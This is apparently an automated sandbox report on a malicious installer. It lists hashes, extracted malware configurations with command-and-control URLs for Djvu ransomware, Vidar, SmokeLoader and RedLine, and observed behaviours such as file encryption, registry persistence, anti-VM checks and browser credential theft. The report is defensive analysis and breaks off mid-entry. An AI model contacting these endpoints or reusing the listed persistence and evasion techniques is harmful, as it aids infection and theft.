Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
1812s -
max time network
1815s -
platform
windows7_x64 -
resource
win7-fr -
submitted
11-09-2021 20:41
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
f59a5fd82eaf0088e7853c09922ce477
-
SHA1
969d1debc32996a4d53c4a36d2241511cb8b77ec
-
SHA256
291505b584fdf540a1590ce7181d85cee7967f99cbf05aeb7b7031b6a9b4f2cd
-
SHA512
344192b08874df2cf922f782400435f109eb5bab7c3c582f4eb3fe328cadcb2d2c3ddd02ba816663168f9c997766f089731e657afe2cefb7bda773e6e6dca71c
Malware Config
Extracted
C:\_readme.txt
djvu
https://we.tl/t-CtDpAM1g5f
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
vidar
40.5
517
https://gheorghip.tumblr.com/
-
profile_id
517
Extracted
vidar
40.5
993
https://gheorghip.tumblr.com/
-
profile_id
993
Signatures
-
Detected Djvu ransomware 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2660-338-0x0000000003060000-0x000000000317B000-memory.dmp family_djvu behavioral2/memory/2448-339-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2568 1636 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1360 1636 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2944-272-0x000000000041C5E2-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe family_socelars \Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe family_socelars \Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe family_socelars \Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe family_socelars -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1660-177-0x0000000000400000-0x00000000017F2000-memory.dmp family_vidar behavioral2/memory/2028-347-0x00000000021D0000-0x00000000022A2000-memory.dmp family_vidar behavioral2/memory/2536-348-0x0000000000400000-0x00000000004D5000-memory.dmp family_vidar behavioral2/memory/2272-363-0x0000000000400000-0x0000000002BC5000-memory.dmp family_vidar behavioral2/memory/2272-362-0x00000000002C0000-0x0000000000391000-memory.dmp family_vidar -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\7zS0D696124\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0D696124\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0D696124\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0D696124\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0D696124\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0D696124\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 64 IoCs
Processes:
MsiExec.exeflow pid process 136 2848 MsiExec.exe 138 2848 MsiExec.exe 139 2848 MsiExec.exe 141 2848 MsiExec.exe 143 2848 MsiExec.exe 145 2848 MsiExec.exe 147 2848 MsiExec.exe 148 2848 MsiExec.exe 149 2848 MsiExec.exe 150 2848 MsiExec.exe 151 2848 MsiExec.exe 152 2848 MsiExec.exe 153 2848 MsiExec.exe 154 2848 MsiExec.exe 155 2848 MsiExec.exe 156 2848 MsiExec.exe 157 2848 MsiExec.exe 158 2848 MsiExec.exe 159 2848 MsiExec.exe 160 2848 MsiExec.exe 161 2848 MsiExec.exe 162 2848 MsiExec.exe 163 2848 MsiExec.exe 164 2848 MsiExec.exe 165 2848 MsiExec.exe 166 2848 MsiExec.exe 167 2848 MsiExec.exe 168 2848 MsiExec.exe 169 2848 MsiExec.exe 170 2848 MsiExec.exe 171 2848 MsiExec.exe 172 2848 MsiExec.exe 173 2848 MsiExec.exe 174 2848 MsiExec.exe 175 2848 MsiExec.exe 176 2848 MsiExec.exe 177 2848 MsiExec.exe 178 2848 MsiExec.exe 179 2848 MsiExec.exe 180 2848 MsiExec.exe 181 2848 MsiExec.exe 182 2848 MsiExec.exe 183 2848 MsiExec.exe 184 2848 MsiExec.exe 185 2848 MsiExec.exe 186 2848 MsiExec.exe 187 2848 MsiExec.exe 188 2848 MsiExec.exe 189 2848 MsiExec.exe 190 2848 MsiExec.exe 191 2848 MsiExec.exe 192 2848 MsiExec.exe 193 2848 MsiExec.exe 194 2848 MsiExec.exe 195 2848 MsiExec.exe 196 2848 MsiExec.exe 197 2848 MsiExec.exe 198 2848 MsiExec.exe 199 2848 MsiExec.exe 200 2848 MsiExec.exe 201 2848 MsiExec.exe 202 2848 MsiExec.exe 203 2848 MsiExec.exe 204 2848 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
46807GHF____.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSat191649b47c9e2.exeSat196ac06a9e6.exeSat19e4750dd01.exeSat199ba8a4637dcb034.exeSat19ba05e89ea6d406.exeSat1946eb84e6.exeSat19e6a852f849bb2.exeSat19c6762a08beae.exeSat19ba05e89ea6d406.tmp46807GHF____.exe795168.exe8209560.exe6384253.exeultramediaburner.exeVososamime.exe5771500.exeMaeqeshyhoto.exe7915684.exeultramediaburner.tmpUltraMediaBurner.exeC3KHKEn~m73GVLA.exEWinHoster.exe6384253.exeGcleanerEU.exeinstaller.exeanyname.exegcleaner.exe510D.exe6AA6.exe8BAE.exe8BAE.exeDllHost.exe8BAE.exeBEEF.exebuild2.exebuild2.exebuild3.exebuild3.exemstsca.exe4010.exeWnUKuKwEyu.exe629F.exemstsca.exeA8B4.exemstsca.exemstsca.exemstsca.exemstsca.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exeAdvancedWindowsManager.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exepid process 1744 setup_installer.exe 1068 setup_install.exe 620 Sat191649b47c9e2.exe 676 Sat196ac06a9e6.exe 1612 Sat19e4750dd01.exe 820 Sat199ba8a4637dcb034.exe 1740 Sat19ba05e89ea6d406.exe 596 Sat1946eb84e6.exe 1660 Sat19e6a852f849bb2.exe 988 Sat19c6762a08beae.exe 2140 Sat19ba05e89ea6d406.tmp 2528 46807GHF____.exe 2872 795168.exe 2900 8209560.exe 2932 6384253.exe 2960 ultramediaburner.exe 3008 Vososamime.exe 3032 5771500.exe 3048 Maeqeshyhoto.exe 560 7915684.exe 1644 ultramediaburner.tmp 1996 UltraMediaBurner.exe 2632 C3KHKEn~m73GVLA.exE 2412 WinHoster.exe 2944 6384253.exe 1264 GcleanerEU.exe 856 installer.exe 2604 anyname.exe 2120 gcleaner.exe 1780 510D.exe 1964 6AA6.exe 2660 8BAE.exe 2448 8BAE.exe 2908 DllHost.exe 2128 8BAE.exe 2532 BEEF.exe 2028 build2.exe 2536 build2.exe 2636 build3.exe 2724 build3.exe 2400 mstsca.exe 2432 4010.exe 1528 WnUKuKwEyu.exe 2272 629F.exe 688 mstsca.exe 1480 A8B4.exe 1956 mstsca.exe 2456 mstsca.exe 1732 mstsca.exe 1504 mstsca.exe 1756 AdvancedWindowsManager.exe 1808 AdvancedWindowsManager.exe 2032 AdvancedWindowsManager.exe 4344 AdvancedWindowsManager.exe 4372 AdvancedWindowsManager.exe 5988 AdvancedWindowsManager.exe 7960 mstsca.exe 7976 mstsca.exe 2504 mstsca.exe 2340 mstsca.exe 7956 mstsca.exe 8012 mstsca.exe 8028 mstsca.exe 7956 mstsca.exe -
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
8BAE.exedescription ioc process File renamed C:\Users\Admin\Pictures\LimitEnter.png => C:\Users\Admin\Pictures\LimitEnter.png.wiot 8BAE.exe File opened for modification C:\Users\Admin\Pictures\SplitSkip.tiff 8BAE.exe File renamed C:\Users\Admin\Pictures\SplitSkip.tiff => C:\Users\Admin\Pictures\SplitSkip.tiff.wiot 8BAE.exe File renamed C:\Users\Admin\Pictures\InitializeWatch.png => C:\Users\Admin\Pictures\InitializeWatch.png.wiot 8BAE.exe File opened for modification C:\Users\Admin\Pictures\MergeExpand.tiff 8BAE.exe File renamed C:\Users\Admin\Pictures\MergeExpand.tiff => C:\Users\Admin\Pictures\MergeExpand.tiff.wiot 8BAE.exe File renamed C:\Users\Admin\Pictures\OpenStart.tif => C:\Users\Admin\Pictures\OpenStart.tif.wiot 8BAE.exe File renamed C:\Users\Admin\Pictures\OutWatch.crw => C:\Users\Admin\Pictures\OutWatch.crw.wiot 8BAE.exe File renamed C:\Users\Admin\Pictures\RestoreNew.raw => C:\Users\Admin\Pictures\RestoreNew.raw.wiot 8BAE.exe File renamed C:\Users\Admin\Pictures\ResumePublish.raw => C:\Users\Admin\Pictures\ResumePublish.raw.wiot 8BAE.exe File renamed C:\Users\Admin\Pictures\SplitUnlock.tif => C:\Users\Admin\Pictures\SplitUnlock.tif.wiot 8BAE.exe File renamed C:\Users\Admin\Pictures\TraceJoin.png => C:\Users\Admin\Pictures\TraceJoin.png.wiot 8BAE.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
4010.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4010.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4010.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeSat19e4750dd01.exeSat19ba05e89ea6d406.exeSat1946eb84e6.exeSat196ac06a9e6.exeSat19e6a852f849bb2.exeSat19ba05e89ea6d406.tmprundll32.exe8209560.exe6384253.exeultramediaburner.exe5771500.exe7915684.exeultramediaburner.tmpWerFault.exepid process 1996 setup_x86_x64_install.exe 1744 setup_installer.exe 1744 setup_installer.exe 1744 setup_installer.exe 1744 setup_installer.exe 1744 setup_installer.exe 1744 setup_installer.exe 1068 setup_install.exe 1068 setup_install.exe 1068 setup_install.exe 1068 setup_install.exe 1068 setup_install.exe 1068 setup_install.exe 1068 setup_install.exe 1068 setup_install.exe 800 cmd.exe 1920 cmd.exe 920 cmd.exe 920 cmd.exe 992 cmd.exe 1968 cmd.exe 972 cmd.exe 1732 cmd.exe 1732 cmd.exe 1752 cmd.exe 1752 cmd.exe 1612 Sat19e4750dd01.exe 1612 Sat19e4750dd01.exe 1740 Sat19ba05e89ea6d406.exe 1740 Sat19ba05e89ea6d406.exe 596 Sat1946eb84e6.exe 596 Sat1946eb84e6.exe 676 Sat196ac06a9e6.exe 676 Sat196ac06a9e6.exe 1660 Sat19e6a852f849bb2.exe 1660 Sat19e6a852f849bb2.exe 1740 Sat19ba05e89ea6d406.exe 2140 Sat19ba05e89ea6d406.tmp 2140 Sat19ba05e89ea6d406.tmp 2140 Sat19ba05e89ea6d406.tmp 2140 Sat19ba05e89ea6d406.tmp 2576 rundll32.exe 2576 rundll32.exe 2576 rundll32.exe 2576 rundll32.exe 2900 8209560.exe 2900 8209560.exe 2932 6384253.exe 2932 6384253.exe 2960 ultramediaburner.exe 2960 ultramediaburner.exe 3032 5771500.exe 3032 5771500.exe 2960 ultramediaburner.exe 560 7915684.exe 560 7915684.exe 1644 ultramediaburner.tmp 1644 ultramediaburner.tmp 1644 ultramediaburner.tmp 1644 ultramediaburner.tmp 1644 ultramediaburner.tmp 1644 ultramediaburner.tmp 1632 WerFault.exe 1632 WerFault.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
46807GHF____.exe8209560.exe8BAE.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\ZHavetohamo.exe\"" 46807GHF____.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8209560.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\\8BAE.exe\" --AutoStart" 8BAE.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
4010.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4010.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exedescription ioc process File opened (read-only) \??\A: installer.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 24 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6050 ip-api.com 11 ip-api.com 124 ip-api.com 4286 api.2ip.ua 5097 api.2ip.ua 5766 ip-api.com 6010 ip-api.com 5726 ip-api.com 234 api.2ip.ua 241 api.2ip.ua 807 ip-api.com 3107 ip-api.com 4010 ip-api.com 5460 ip-api.com 1015 ip-api.com 2498 ip-api.com 4533 api.2ip.ua 4534 api.2ip.ua 6085 ip-api.com 6199 ip-api.com 235 api.2ip.ua 1536 ip-api.com 2188 ip-api.com 6146 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
4010.exepid process 2432 4010.exe -
Suspicious use of SetThreadContext 34 IoCs
Processes:
6384253.exe8BAE.exeDllHost.exebuild2.exebuild3.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exe8BAE.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exe8BAE.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exe8BAE.exemstsca.exemstsca.exedescription pid process target process PID 2932 set thread context of 2944 2932 6384253.exe 6384253.exe PID 2660 set thread context of 2448 2660 8BAE.exe 8BAE.exe PID 2908 set thread context of 2128 2908 DllHost.exe 8BAE.exe PID 2028 set thread context of 2536 2028 build2.exe build2.exe PID 2636 set thread context of 2724 2636 build3.exe build3.exe PID 2400 set thread context of 688 2400 mstsca.exe mstsca.exe PID 1956 set thread context of 2456 1956 mstsca.exe mstsca.exe PID 1732 set thread context of 1504 1732 mstsca.exe mstsca.exe PID 7960 set thread context of 7976 7960 mstsca.exe mstsca.exe PID 2504 set thread context of 2340 2504 mstsca.exe mstsca.exe PID 7956 set thread context of 8012 7956 mstsca.exe mstsca.exe PID 8028 set thread context of 7956 8028 mstsca.exe mstsca.exe PID 7944 set thread context of 8000 7944 mstsca.exe mstsca.exe PID 7728 set thread context of 7684 7728 mstsca.exe mstsca.exe PID 1160 set thread context of 7692 1160 mstsca.exe mstsca.exe PID 8080 set thread context of 2624 8080 mstsca.exe mstsca.exe PID 7724 set thread context of 7868 7724 mstsca.exe mstsca.exe PID 7760 set thread context of 7748 7760 mstsca.exe mstsca.exe PID 7704 set thread context of 8068 7704 8BAE.exe 8BAE.exe PID 2368 set thread context of 1768 2368 mstsca.exe mstsca.exe PID 7216 set thread context of 7244 7216 mstsca.exe mstsca.exe PID 7508 set thread context of 7532 7508 mstsca.exe mstsca.exe PID 4484 set thread context of 4520 4484 mstsca.exe mstsca.exe PID 4952 set thread context of 5044 4952 mstsca.exe mstsca.exe PID 4728 set thread context of 4804 4728 8BAE.exe 8BAE.exe PID 4676 set thread context of 4880 4676 mstsca.exe mstsca.exe PID 3336 set thread context of 3376 3336 mstsca.exe mstsca.exe PID 3872 set thread context of 3892 3872 mstsca.exe mstsca.exe PID 3960 set thread context of 3964 3960 mstsca.exe mstsca.exe PID 7612 set thread context of 3184 7612 mstsca.exe mstsca.exe PID 328 set thread context of 1272 328 mstsca.exe mstsca.exe PID 4660 set thread context of 4964 4660 8BAE.exe 8BAE.exe PID 1520 set thread context of 828 1520 mstsca.exe mstsca.exe PID 5000 set thread context of 3152 5000 mstsca.exe mstsca.exe -
Drops file in Program Files directory 15 IoCs
Processes:
46807GHF____.exeultramediaburner.tmpmsiexec.exedescription ioc process File created C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe.config 46807GHF____.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\Windows Media Player\ZHavetohamo.exe 46807GHF____.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File created C:\Program Files (x86)\Windows Media Player\ZHavetohamo.exe.config 46807GHF____.exe File created C:\Program Files (x86)\UltraMediaBurner\is-4ITOB.tmp ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-TAU4D.tmp ultramediaburner.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe 46807GHF____.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe -
Drops file in Windows directory 30 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\f761390.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7BE8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI836A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2DBC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI780F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI40C1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6B40.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7A52.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3E60.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2501.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4390.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI46EB.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI757F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7ED6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1D33.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI71F5.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI5E33.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2B0C.tmp msiexec.exe File created C:\Windows\Installer\f761392.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI5FC9.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\f761392.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI2724.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2909.tmp msiexec.exe File created C:\Windows\Installer\f761394.msi msiexec.exe File opened for modification C:\Windows\Installer\f761390.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1632 1660 WerFault.exe Sat19e6a852f849bb2.exe 2216 2932 WerFault.exe 6384253.exe 2864 560 WerFault.exe 7915684.exe 948 2872 WerFault.exe 795168.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
avwvuuwavwvuuwSat19c6762a08beae.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI avwvuuw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI avwvuuw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sat19c6762a08beae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI avwvuuw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI avwvuuw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI avwvuuw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI avwvuuw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sat19c6762a08beae.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sat19c6762a08beae.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build2.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2504 schtasks.exe 2336 schtasks.exe 2084 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 2148 timeout.exe 1548 timeout.exe 2028 timeout.exe 752 timeout.exe -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1620 taskkill.exe 2712 taskkill.exe 2452 taskkill.exe 436 taskkill.exe 2440 taskkill.exe 744 taskkill.exe 880 taskkill.exe 2680 taskkill.exe -
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0dd594b4da7d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 iexplore.exe Key created 